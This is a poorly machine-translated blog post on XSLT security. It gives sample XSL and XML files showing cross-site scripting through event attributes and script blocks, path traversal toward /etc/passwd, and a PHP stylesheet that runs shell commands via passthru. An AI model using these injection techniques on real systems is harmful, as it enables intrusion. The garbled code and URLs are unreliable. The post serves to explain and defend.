Discuss XSLT Security

Surging clouds

I 've been tossing suddy lately.XSLTSecurity question, he wrote a good blog: http://bbs.2cto.com/read.php? Tid = 60523

I want to add snacks today. Limited energy, only sloppy writing.

XSLT 2.0 is more powerful, but not fully supported by browsers.

Implemented in java and phpXSLT Processor

In the client browser, XSLT Processor is also implemented and can be called through js.

The process of transform is equivalent to assembling xml data in the xsl style file, assembling an html file, and finally displaying it on the browser. For more details, refer to the W3C standards on XHTML and XSLT.

On the client side, you can refer to the following JS:
<Script>
Function loadXMLDoc (fname)
{
Var xmlDoc;
// Code for IE
If (window. ActiveXObject)
{
XmlDoc = new ActiveXObject ("Microsoft. XMLDOM ");
}
// Code for Mozilla, Firefox, Opera, etc.
Else if (document. implementation
& Document. implementation. createDocument)
{
XmlDoc = document. implementation. createDocument ("", "", null );
}
Else
{
Alert (Your browser cannot handle this script );
}
XmlDoc. async = false;
XmlDoc. load (fname );
Return (xmlDoc );
}

Function displayResult ()
{
Xml = loadXMLDoc ("test. xml ");
Xsl = loadXMLDoc ("test. xsl ");
// Code for IE
If (window. ActiveXObject)
{
Ex = xml. transformNode (xsl );
Document. getElementById ("example"). innerHTML = ex;
}
// Code for Mozilla, Firefox, Opera, etc.
Else if (document. implementation
& Document. implementation. createDocument)
{
Required tprocessor = new required tprocessor ();
Effectprocessor. importStylesheet (xsl );
ResultDocument = effectprocessor. transformToFragment (xml, document );
Document. getElementById ("example"). appendChild (resultDocument );
}
}

</Script>

In this process,If the output is in HTML, Transform itself will not produce any problems, even if transform has some special symbols, such as <script>, it will be treated as text in html. (Even if the data before transform passes through htmlencode, it will be restored by transform. Therefore, the data before htmlencode transform is useless. However, there are some trick methods to output htmlencode data)

That is, the data value of a node in the xml file is: <script> alert (1); </script> cannot be executed in the assembled html.

As shown in firebug below:

However, If the output of this value is in the script element or in an element event, the script may be executed.

For example, in the xsl file:

<? Xml version = "1.0" encoding = "ISO-8859-1"?>
< Xsl: stylesheetVersion = "1.0"
Xmlns: xsl = "http://www.w3.org/1999/XSL/Transform">

<Xsl: template match = "/">
<Html>
<Body>
<H2> My CD Collection <Table border = "1">
<Tr bgcolor = "#9acd32">
<Th align = "left"> Title </th>
<Th align = "left"> Artist </th>
</Tr>
<Xsl: for-each select = catalog/cd>
<Tr>
<Td> <xsl: value-of select = "title"/> </td>
<Td> <xsl: value-of select = artist/> </td>
<Script type = "text/javascript">
Var x = <Xsl: value-of select = "artist"/>;
Alert (x );
</Script>
<Input type = "text">
<Xsl: attribute name = "ONCLICK"> <xsl: value-of select = "artist"/> </xsl: attribute>
</Input>
</Tr>
</Xsl: for-each>
</Table>


</Body>
</Html>
</Xsl: template>

</Xsl: stylesheet>


In the xml file:
<? Xml version = "1.0" encoding = "ISO-8859-1"?>
<Catalog>
<Cd>
<Title> <! [CDATA [</script> <script> alert (/xss1/); </script>]> </title>
<Artist> alert (1); </artist>
<Country> USA </country>
<Company> Columbia </company>
<Price> 10.90 </price>
<Year> 1985 </year>
</Cd>

</Catalog>

Then the onclick event will execute alert (1)

Similarly, after the appropriate xml data is modified, the data output in the script tag is also executed.

For how to solve this problem, refer to my previous blogs.


In addition, some security problems occur in the xsl file.

First, the XSL file may cause XSS

If you are allowed to directly upload the XSL file, you may directly write the script for execution.

XSL supports script extension, that is, script tag.

Some XSLT ProcessorLocal files can also be called through Document () or functions similar to doc ()Loading a local file in. If the control is poor, it may cause similar loading .. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd.


In addition, sometimes some server-side functions can be executed in XSLT, such as: (this is unique to php xslt Processor)
<Xsl: stylesheet version = "1.0" xmlns: xsl = "http://www.w3.org/5o/#/transform" xmlns: php =" http://php.net/#">
<Xsl: template match = "/">
<Xsl: value-of select = "php: function ('passthru', ls-la/')"/>
</Xsl: template>
</Xsl: stylesheet>


IE once declared that they are safe, because the script extension was disabled in MSXML for a long time.In the XSL
<Script>
......
</Script>

It is not parsed by IE. To use it, additional configuration options are required.

In addition, the document function is disabled in MSXML.

These options indeed increase the security of IE, but I found that, IE does not process the output in the event.

That is to say, similar

<Input type = "text">
<Xsl: attribute name = "ONCLICK"> <xsl: value-of select = "artist"/> </xsl: attribute>
</Input>

Statement, It will still cause XSS execution.


References:
Html "target = _ blank> Http://www.tkachenko.com/blog/archives/000726.html

Http://www.acunetix.com/blog/web-security-articles/the-hidden-dangers-of-xsltprocessor-remote-xsl-injection/